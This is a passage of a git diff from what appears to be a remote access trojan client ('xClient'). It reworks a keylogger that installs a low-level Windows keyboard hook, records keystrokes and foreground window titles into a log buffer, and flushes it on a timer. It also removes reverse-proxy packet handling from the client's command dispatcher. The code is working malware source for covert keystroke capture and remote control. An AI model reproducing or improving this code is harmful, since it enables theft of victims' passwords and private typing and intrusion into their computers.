_hWndLastTitle = _hWndTitle; - _logFileBuffer.Append("

[" + _hWndTitle + "]
"); + // Only write the title to the log file if the names are different. + if (_hWndTitle != _hWndLastTitle) + { + _hWndLastTitle = _hWndTitle; + _logFileBuffer.Append("

[" + _hWndTitle + "]
"); + } + } + + if (keyToLog.ModifierKeysSet) + { + if (keyToLog.PressedKey.IsSpecialKey()) + { + // The returned string could be empty. If it is, ignore it + // because we don't know how to handle that special key. + // The key would be considered unsupported. + string pressedKey = keyToLog.PressedKey.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(pressedKey)) + { + _logFileBuffer.Append(HighlightSpecialKey(pressedKey)); + } + } + else + { + // The pressed key is not special, but we have encountered + // a situation of multiple key presses, so just build them. + _logFileBuffer.Append(HighlightSpecialKey(keyToLog.ModifierKeys.BuildString() + + FromKeys(keyToLog))); + } + } + else + { + if (keyToLog.PressedKey.IsSpecialKey()) + { + string pressedKey = keyToLog.PressedKey.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(pressedKey)) + { + _logFileBuffer.Append(HighlightSpecialKey(pressedKey)); + } + } + else + { + _logFileBuffer.Append(FromKeys(keyToLog)); + } } } - } - catch - { - } + catch + { + } - _keysDown.Add(key); - } + _keysDown.Add(keyToLog); //avoid multiple keypress holding down a key + } + break; + case WM_KEYUP: + case WM_SYSKEYUP: + _keysDown.RemoveAll(k => k == keyToLog); //remove 'keydown' key after up message + break; } } @@ -206,90 +173,18 @@ namespace xClient.Core.Keylogger _hookHandle = Win32.SetWindowsHookEx(WH_KEYBOARD_LL, _hook, Win32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0); //hook installed, enabled _timerFlush.Enabled = true; - _timerEmptyKeyBuffer.Enabled = true; IsEnabled = true; - Application.Run(); - Win32.UnhookWindowsHookEx(_hookHandle); + Application.Run(); //start message pump for our hook on this thread break; case false: _timerFlush.Enabled = false; - _timerEmptyKeyBuffer.Enabled = false; - Application.ExitThread(); + if (_hookHandle != IntPtr.Zero) + Win32.UnhookWindowsHookEx(_hookHandle); + Application.ExitThread(); //Bug: Thread doesn't exit, message pump still running, disconnecting client will hang in memory break; } } - private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) - { - int j = 0; - - foreach (var k in _keyBuffer) - { - try - { - // Make sure that the key that was logged is not null. - // If it is, we can safely ignore it by just making it - // stop here. - if (k != null) - { - // If any modifier key was set besides shift and caps - // lock, we will handle it differently than we would - // normal keys. - if (k.ModifierKeysSet) - { - // If the pressed key is special, it should be treated as such - // by using its provided name. - if (k.PressedKey.IsSpecialKey()) - { - // The returned string could be empty. If it is, ignore it - // because we don't know how to handle that special key. - // The key would be considered unsupported. - string pressedKey = k.PressedKey.GetKeyloggerKeyName(); - - if (!string.IsNullOrEmpty(pressedKey)) - { - _logFileBuffer.Append(HighlightSpecialKey(pressedKey)); - } - } - else - { - // The pressed key is not special, but we have encountered - // a situation of multiple key presses, so just build them. - _logFileBuffer.Append(HighlightSpecialKey(k.ModifierKeys.BuildString() + - FromKeys(k, false))); - } - } - // We don't have to worry about nearly all modifier keys... - // With the exception of the shift key and caps lock! :) - // At this point we know that shift or caps lock was the - // only pressed key. - else - { - // There is not really a need to handle if caps lock or - // shift has been handled because the way we obtain the - // value of the pressed key (that is not special) will - // use the key states and determine for us. - _logFileBuffer.Append(FromKeys(k)); - } - } - } - catch - { } - - j++; - } - - if (j > 0 && j <= _keyBuffer.Count) - { - try - { - _keyBuffer.RemoveRange(0, j); - } - catch - { } - } - } - private void timerFlush_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { if (_logFileBuffer.Length > 0) @@ -360,22 +255,16 @@ namespace xClient.Core.Keylogger return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid)); } - private char? FromKeys(LoggedKey key, bool AllowCapitalization = true) + private char? FromKeys(LoggedKey key) { //keyStates is a byte array that specifies the current state of the keyboard and keys //The keys we are interested in are modifier keys such as shift and caps lock byte[] keyStates = new byte[256]; - if (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization) + if (key.ModifierKeys.ShiftKeyPressed) keyStates[(int)KeyloggerKeys.VK_SHIFT] = 0x80; - if (key.ModifierKeys.CtrlKeyPressed) - keyStates[(int)KeyloggerKeys.VK_CONTROL] = 0x80; - - if (key.ModifierKeys.AltKeyPressed) - keyStates[(int)KeyloggerKeys.VK_MENU] = 0x80; - - if (key.ModifierKeys.CapsLock && AllowCapitalization) + if (key.ModifierKeys.CapsLock) keyStates[(int)KeyloggerKeys.VK_CAPITAL] = 0x01; if (key.ModifierKeys.NumLock) diff --git a/Client/Program.cs b/Client/Program.cs index cff2efe7..21358417 100644 --- a/Client/Program.cs +++ b/Client/Program.cs @@ -7,7 +7,6 @@ using xClient.Core; using xClient.Core.Commands; using xClient.Core.Keylogger; using xClient.Core.Packets; -using xClient.Core.ReverseProxy; namespace System.Runtime.CompilerServices { @@ -100,10 +99,6 @@ namespace xClient typeof (Core.Packets.ClientPackets.ShellCommandResponse), typeof (Core.Packets.ClientPackets.GetStartupItemsResponse), typeof (Core.Packets.ClientPackets.GetLogsResponse), - typeof (Core.ReverseProxy.Packets.ReverseProxyConnect), - typeof (Core.ReverseProxy.Packets.ReverseProxyConnectResponse), - typeof (Core.ReverseProxy.Packets.ReverseProxyData), - typeof (Core.ReverseProxy.Packets.ReverseProxyDisconnect) }); ConnectClient.ClientState += ClientState; @@ -337,13 +332,6 @@ namespace xClient { CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs)packet, client); } - else if (type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnect) || - type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnectResponse) || - type == typeof(Core.ReverseProxy.Packets.ReverseProxyData) || - type == typeof(Core.ReverseProxy.Packets.ReverseProxyDisconnect)) - { - ReverseProxyCommandHandler.HandleCommand(client, packet); - } } } } \ No newline at end of file